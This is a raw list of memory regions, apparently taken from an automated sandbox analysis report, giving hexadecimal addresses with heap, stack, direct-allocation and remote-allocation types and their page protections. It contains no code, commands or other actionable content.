page read and write
250000
unkown
page readonly
4B4000
heap
page read and write
19D000
stack
page read and write
591D000
heap
page read and write
19D000
stack
page read and write
120000
unkown
page readonly
BC3000
heap
page read and write
138F8D90000
heap
page read and write
401000
unkown
page execute read
890000
heap
page read and write
1350000
heap
page read and write
99E000
stack
page read and write
2041000
heap
page read and write
102B000
heap
page read and write
250000
unkown
page readonly
B8C000
heap
page read and write
782000
heap
page read and write
6C9A4000
unkown
page read and write
6C8F1000
unkown
page execute read
4A4000
heap
page read and write
4E0000
heap
page read and write
3360000
remote allocation
page read and write
280000
unkown
page readonly
5E2000
heap
page read and write
4F81000
heap
page read and write
74B000
heap
page read and write
2059000
heap
page read and write
BAC000
heap
page read and write
D5C000
stack
page read and write
2041000
heap
page read and write
29B4000
heap
page read and write
41C0000
heap
page read and write
608E000
heap
page read and write
BAC000
heap
page read and write
2059000
heap
page read and write
2059000
heap
page read and write
27D000
unkown
page write copy
11E0000
heap
page read and write
6C8F1000
unkown
page execute read
10B0000
heap
page read and write
32000
unkown
page readonly
57C0000
heap
page read and write
10001000
direct allocation
page execute read
1006B000
direct allocation
page execute read
4B0000
heap
page read and write
113CA657000
heap
page read and write
5700000
heap
page read and write
BBA000
heap
page read and write
26A0000
direct allocation
page read and write
2720000
heap
page read and write
9AF000
stack
page read and write
6081000
heap
page read and write
113CA642000
heap
page read and write
3E0000
heap
page read and write
3420000
direct allocation
page read and write
1F30000
heap
page read and write
BAC000
heap
page read and write
6C9A9000
unkown
page readonly
10630000
direct allocation
page read and write
26A0000
direct allocation
page read and write
1001E000
direct allocation
page readonly
3801000
heap
page read and write
402000
unkown
page readonly
3DB0000
direct allocation
page execute and read and write
1B76F775000
heap
page read and write
2310000
heap
page read and write
BB8000
heap
page read and write
2059000
heap
page read and write
2059000
heap
page read and write
BC6000
heap
page read and write
617000
heap
page read and write
6D0000
heap
page read and write
BB8000
heap
page read and write
5394000
heap
page read and write
61C000
heap
page read and write
11000
unkown
page execute read
27D000
unkown
page read and write
2041000
heap
page read and write
BB4000
heap
page read and write
157E000
stack
page read and write
5510000
trusted library allocation
page read and write
BB8000
heap
page read and write
4B4000
heap
page read and write
10FC000
stack
page read and write
520000
heap
page read and write
BC4000
heap
page read and write
BA5000
heap
page read and write
402000
unkown
page readonly
1FE1000
heap
page read and write
250000
unkown
page readonly
1B76F770000
heap
page read and write
509D000
heap
page read and write
282E000
stack
page read and write
3B00000
direct allocation
page read and write
1F61000
heap
page read and write
5981000
heap
page read and write
400000
unkown
page readonly
6C8F1000
unkown
page execute read
3AF0000
direct allocation
page read and write
113CA9A5000
heap
page read and write
55B000
heap
page read and write
68E000
stack
page read and write
BC8000
heap
page read and write
78E000
heap
page read and write
6C8F0000
unkown
page readonly
554000
heap
page read and write
BC4000
heap
page read and write
2059000
heap
page read and write
19D000
stack
page read and write
6C9A9000
unkown
page readonly
BC8000
heap
page read and write
B36000
heap
page read and write
5081000
heap
page read and write
1F61000
heap
page read and write
26D000
unkown
page readonly
1FE1000
heap
page read and write
5510000
trusted library allocation
page read and write
4B4000
heap
page read and write
251000
unkown
page execute read
4F81000
heap
page read and write
2041000
heap